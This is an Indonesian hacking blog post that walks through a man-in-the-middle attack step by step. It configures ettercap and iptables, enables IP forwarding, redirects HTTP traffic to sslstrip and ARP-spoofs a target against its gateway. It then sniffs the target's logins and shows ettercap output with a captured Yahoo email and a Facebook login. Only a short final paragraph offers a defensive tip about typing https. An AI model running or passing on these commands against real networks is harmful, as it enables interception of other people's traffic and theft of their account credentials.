Facebook Twitter Friendfeed
Gratis berlangganan artikel Genesick Blog!

Jumat, 23 Desember 2011

Threads : Mengenal Serangan Man-in-The-Middle (MITM)

Jumat, 23 Desember 2011

Date
Tags →

- Sudah banyak artikel di ilmuhacking yang membahas teknik serangan man in the middle (mitm), namun belum pernah saya menjelaskan secara detil tentang apa itu mitm attack. Mitm attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat.


Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya. 

Kali ini saya akan lebih fokus ke Sniffing (snifer) Siapkan :

1. Kopi Cappucino, Rokok Sampoerna (Bagi yang merokok hehehhehehe), n Koneksi Jaringan dengan kecepatan 1 Gbp/s

2. Edit File /etc/etter.conf
root@th3-d0rk# kwrite /etc/etter.conf

Cari bagian ini 
# if you use iptables: 

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Kemudian Hilangkan tanda # seperti ini : 
# if you use iptables: 
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 

3. Aktifkan IP Forward 

root@th3-d0rk#echo 1 > /proc/sys/net/ipv4/ip_forward 

Redirect port 80 ke port 10000 (sslstrip) 
root@th3-d0rk# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 

4. Ok sekarang jalankan ArpSpoofing 
Contoh : 
Target : 192.168.2.105 
Gateway : 192.168.2.244 

root@th3-d0rk# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244 

6. Kemudian Jalankan SSLSTRIP 

root@th3-d0rk# sslstrip -a -k -f 

7. Ok langkah Terakhir Jalankan ettercap 

root@th3-d0rk# ettercap -T -q -i wlan0 
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close : 
root@th3-d0rk# ettercap -T -q -i wlan0 

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA 

Listening on wlan0... 

(Ethernet) wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0 

Privileges dropped to UID 65534 GID 65534... 

28 plugins 
39 protocol dissectors 
53 ports monitored 
7587 mac vendor fingerprint 
1698 tcp OS fingerprint 
2183 known services 

Starting Unified sniffing... 

Text only Interface activated... 
Hit 'h' for inline help 

HTTP : 69.63.181.26:80 -> USER: toovix07@yahoo.com PASS: (rahasia ) 
INFO: http://www.facebook.com/login.php?ap...id=10000119039

Tips Pencegahan Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.

Sekian Dulu yah jangan lupa comment :-) 

Sumber : Norphil.com

Pengunjung Yang Baik Selalu Meninggalkan Komentar

Anda sedang membaca artikel Threads : Mengenal Serangan Man-in-The-Middle (MITM) dan artikel ini url permalinknya adalah http://gnsck.blogspot.com/2011/12/threads-mengenal-serangan-man-in-middle.html
Semoga artikel Threads : Mengenal Serangan Man-in-The-Middle (MITM) ini bisa bermanfaat.


 

Pengikut

GENESICK Blog is proudly powered by Blogger.com | Template by GENESICK Team